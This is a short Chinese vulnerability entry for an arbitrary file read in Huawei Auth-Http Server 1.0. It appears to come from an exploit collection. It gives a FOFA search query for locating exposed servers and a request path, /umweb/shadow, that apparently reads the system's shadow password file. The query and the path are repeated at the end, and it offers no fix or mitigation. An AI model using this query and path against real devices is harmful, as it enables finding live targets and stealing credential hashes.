华为Auth-Http Server 1.0存在任意文件读取
一、漏洞简介
华为Auth-Http Server 1.0存在任意文件读取漏洞
二、影响版本
- 华为Auth-Http Server 1.0
三、资产测绘
- fofa
server="Huawei Auth-Http Server 1.0"
- 特征
四、漏洞复现
/umweb/shadow
华为Auth-Http Server 1.0存在任意文件读取漏洞
server="Huawei Auth-Http Server 1.0"
/umweb/shadow